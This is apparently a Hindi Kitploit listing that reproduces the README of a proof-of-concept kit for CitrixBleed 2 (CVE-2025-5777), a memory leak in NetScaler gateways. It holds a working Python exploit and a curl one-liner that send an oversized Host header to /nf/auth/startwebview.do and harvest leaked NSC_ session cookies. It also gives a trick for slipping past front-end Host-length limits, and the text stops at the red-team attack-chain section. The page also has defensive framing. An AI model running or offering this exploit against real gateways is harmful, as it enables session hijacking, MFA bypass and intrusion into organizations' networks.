Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CitrixBleed-2-CVE-2025-5777-PoC- — CitrixBleed 2 — CVE-2025-5777 (आउट-ऑफ-बाउंड्स लीक) PoC और डिटेक्शन किट का विस्तृत विवरण | Kitploit
उपकरण/GitHubGitHub/mingshenhk/citrixbleed-2-cve-2025-5777-poc-
रक्षात्मक उपकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगघटना प्रतिक्रिया

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
लैब और अभ्यास
GitHubmingshenhk/citrixbleed-2-cve-2025-5777-poc-

CitrixBleed-2-CVE-2025-5777-PoC-

CitrixBleed 2 — CVE-2025-5777 (आउट-ऑफ-बाउंड्स लीक) PoC और डिटेक्शन किट का विस्तृत विवरण

रिपॉजिटरी देखें
172121 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CitrixBleed 2 (CVE-2025-5777) अंतिम विश्लेषण

NetScaler ADC / Gateway में एक Out-of-Bounds Memory Read — कारण से लेकर हमले और बचाव अभ्यास तक का व्यापक मैनुअल


poc उपयोग: python3 poc.py https://gateway.example.com

exp उपयोग: python3 exp.py https://gateway.example.com admin 7acbb35f4d...

विषय सूची

0x00  परिचय / त्वरित अवलोकन
0x01  पृष्ठभूमि: NetScaler आर्किटेक्चर और CitrixBleed 1 की पुनरावृत्ति
0x02  कमजोरी का विवरण (प्रभावित संस्करण, CVSS, शोषण परिणाम)
0x03  ट्रिगर तंत्र का गहन विश्लेषण (स्रोत कोड स्तर विश्लेषण और डीबग स्क्रीनशॉट)
0x04  न्यूनतम PoC + उन्नत स्कैनिंग स्क्रिप्ट
0x05  रेड टीम दृष्टिकोण: पूर्ण आक्रमण श्रृंखला (खोज → लीक → सत्र अपहरण → आंतरिक नेटवर्क लेटरल मूवमेंट)
0x06  ब्लू टीम दृष्टिकोण: पता लगाना, फोरेंसिक और पैच सत्यापन
0x07  रक्षा सुदृढ़ीकरण: पैच, WAF, कॉन्फ़िगरेशन, संपत्ति प्रबंधन
0x08  सीखने / समीक्षा रोडमैप और व्यावहारिक प्रयोग
परिशिष्ट A  Sigma / Suricata / Nginx-Lua नियम
परिशिष्ट B  पैच/शोषण समयरेखा और IoC स्नैपशॉट
संदर्भ

0x00 परिचय / त्वरित अवलोकन

  • CVE-2025-5777 (जिसे CitrixBleed 2 भी कहा जाता है) Citrix NetScaler ADC / Gateway में एक Out-of-Bounds Memory Read है।
  • हमलावर को प्रमाणीकरण की आवश्यकता नहीं है, बस एक अत्यधिक लंबे Host हेडर के साथ GET अनुरोध भेजने से उपकरण यादृच्छिक मेमोरी ब्लॉक को HTTP प्रतिक्रिया के साथ क्लाइंट को "उगल" देता है।
  • लीक डेटा में अक्सर NSC_USER / NSC_TASS Cookie, SAML StateContext, MFA टोकन जैसी महत्वपूर्ण सामग्री शामिल होती है, जिसका सीधे उपयोग करके सत्र अपहरण और MFA बाईपास किया जा सकता है ([arcticwolf.com][1], [tenable.com][2])।
  • CVSS v4 आधार स्कोर 9.3 (गंभीर) ([netscaler.com][3])।
  • 2025-06-17 को सार्वजनिक, 2025-06-23 को Citrix ने प्रभाव क्षेत्र बढ़ाया और पैच जारी किया; एक सप्ताह के भीतर ReliaQuest, Bishop Fox जैसी सुरक्षा कंपनियों ने वास्तविक दुनिया में शोषण में वृद्धि देखी ([reliaquest.com][4], [bishopfox.com][5])।

0x01 पृष्ठभूमि

1.1 NetScaler कार्यप्रवाह संक्षिप्त विवरण

┌──────────────┐
│ Client       │ ① HTTPS
└──────┬───────┘
       │
┌──────▼───────┐
│ NetScaler    │ ② AAA / Gateway प्रमाणीकरण
│  (WebProc)   │
└──────┬───────┘
       │
┌──────▼───────┐
│ ICA Proxy /  │ ③ आगे एप्लिकेशन पर
│ CVPN / RDP   │
└──────────────┘

NetScaler मल्टी-प्रोसेस + आंतरिक IPC डिज़ाइन का उपयोग करता है। WebProc AAA / Gateway पथ के तहत अधिकांश HTTP अनुरोधों को संभालता है, जिसमें /nf/auth/*, /oauth/* आदि शामिल हैं। यह C भाषा में बड़े पैमाने पर snprintf() / memcpy() का उपयोग करता है, हर बार XML/HTML खंडों को जोड़ता है।

1.2 CitrixBleed 1 (CVE-2023-4966) पुनरावलोकन

  • 2023 में इसी प्रकार की कमजोरी OAuth डिस्कवरी इंटरफ़ेस /oauth/idp/.well-known/openid-configuration पर हुई।
  • इसका सार भी वही है: snprintf के रिटर्न वैल्यू को बाद के send() के len पैरामीटर के रूप में उपयोग करना → मेमोरी ओवर-रीड।
  • CitrixBleed 2 साबित करता है कि उसी प्रकार का सुरक्षा कोडिंग दोष अभी भी अन्य पथों में छिपा हुआ है।

सीखा गया सबक: यदि सुरक्षा पैच केवल "हथौड़ा बिंदु" को लक्षित करते हैं न कि "प्रोग्रामिंग प्रतिमान" को, तो "टेम्पलेटेड पुनरुत्पादन" के लिए जगह बच जाती है।


0x02 कमजोरी का विवरण

फ़ील्डसामग्री
CVECVE-2025-5777
उपनामCitrixBleed 2
कमजोरी प्रकारOut-of-Bounds Read / सूचना रिसाव
CVSS v4 आधार9.3 (गंभीर) ([netscaler.com][3])
प्रभावित संस्करण< 14.1-43.56 ; < 13.1-58.32 ; 13.1-37.235-FIPS/NDcPP ; 12.1-55.327-FIPS ([netscaler.com][3])
शोषण की शर्तेंNetScaler को Gateway (VPN/ICA Proxy/CVPN/RDP Proxy) या AAA वर्चुअल सर्वर के रूप में कॉन्फ़िगर किया गया हो ([arcticwolf.com][1])
शोषण परिणाममेमोरी रिसाव → सत्र टोकन → प्रमाणीकरण बाईपास / MFA बाईपास → लेटरल मूवमेंट

0x03 ट्रिगर तंत्र का गहन विश्लेषण

यह खंड 13.1-55.18 फर्मवेयर के डी-कंपाइलेशन + gdb डीबगिंग पर आधारित है, जो सार्वजनिक ब्लॉग से संकलित है ([bishopfox.com][5])।

3.1 कमजोरी का प्रवेश बिंदु

  • URI: /nf/auth/startwebview.do
  • नियंत्रणीय पैरामीटर: HTTP Host हेडर
  • यह इंटरफ़ेस Citrix Workspace WebView के रीडायरेक्ट XML उत्पन्न करने के लिए उपयोग किया जाता है। सामान्य प्रतिक्रिया का उदाहरण:
<AuthenticateResponse>
  <wv:StartUrl>https://gateway.example.com/Citrix/AAA/start.html</wv:StartUrl>
  ...
</AuthenticateResponse>

3.2 मुख्य फ़ंक्शन श्रृंखला

citrix_webview_handler()
 ├─ build_auth_xml()
 │    ├─ snprintf(buf, 0x1800, TEMPLATE, host_hdr, ... );
 │    └─ return length;           // ⚠️ length 0x1800 से अधिक हो सकता है
 └─ ns_vpn_send_response(conn, 0x980200, buf, length);

बग बिंदु: snprintf "वास्तव में लिखी जाने वाली लंबाई" लौटाता है न कि वास्तविक लिखी गई लंबाई; यदि उपयोगकर्ता द्वारा भेजा गया Host > 0x1800 - स्थिर खंड लंबाई, तो length > sizeof(buf) होगा।

3.3 रनटाइम उदाहरण

buf: [-----XML-----][OOB][OOB][OOB]......            <- 0x1800 बाइट्स सीमा
                          ↑
                 ns_vpn_send_response द्वारा एक साथ भेजा गया

GDB ब्रेकपॉइंट प्रदर्शन (मुख्य रजिस्टर):

RDI (dst) = 0x7fffa2e31800  // buf
RSI (len) = 0x00001e42      // length=7746 (>6144)

read() परिणाम दर्शाता है कि अंतिम 1,600 बाइट्स अप्रारंभीकृत मेमोरी से आते हैं, जहाँ अन्य SSL सत्रों के Cookie बफ़र दिखाई देते हैं।

3.4 लीक डेटा के प्रकार

श्रेणीनमूना खंड (असंवेदनशील बनाया गया)
सत्र CookieSet-Cookie: NSC_USER=john.doe;NSC_TASS=abc123...
MFA/OTP टोकनradius_state=0e2a9c6d1553...
अन्य अनुरोध निकाय<username>audituser</username><password>***</password>

0x04 PoC कार्यान्वयन

4.1 एकल फ़ाइल Python (15 पंक्तियाँ)

#!/usr/bin/env python3
# CVE-2025-5777 न्यूनतम PoC (केवल अधिकृत परीक्षण)
import requests, sys, urllib3, re
urllib3.disable_warnings()

if len(sys.argv) != 2:
    exit(f"उपयोग: {sys.argv[0]} https://NSVIP")

url = sys.argv[1].rstrip("/") + "/nf/auth/startwebview.do"
hdr = {"Host": "A" * 0x6000}               # >0x1800 ट्रिगर करता है
r = requests.get(url, headers=hdr, verify=False, timeout=10)

print("[+] HTTP", r.status_code, "बाइट्स:", len(r.content))
hits = re.findall(br"(NSC_[A-Z]+=[^;]{10,})", r.content)
for h in hits: print("  कुकी लीक ->", h.decode())

open("leak.bin", "wb").write(r.content)
print("[+] ऑफ़लाइन grep के लिए leak.bin सहेजा गया।")
  • निष्पादन के बाद यदि 200 + कई KB वापस आता है, तो कमजोरी मौजूद मानी जाती है।
  • leak.bin से Cookie= और <AuthenticateContext> जैसे कीवर्ड खोजें।

4.2 Bash / curl एक-पंक्ति

curl -ks -H "Host: $(python -c 'print(\"A\"*6000)')" \
     https://NSVIP/nf/auth/startwebview.do -o leak.bin

बाईपास: कुछ उपकरणों पर अग्र-छोर F5 / Nginx ने Host लंबाई सीमा लगा रखी है; इसे एकाधिक उपडोमेन जोड़कर बाईपास किया जा सकता है, जैसे foo.foo.foo.…foo.example.com (3000 बार foo दोहराएं)।


0x05 रेड टीम दृष्टिकोण: पूर्ण आक्रमण श्रृंखला

टूल डाउनलोड करें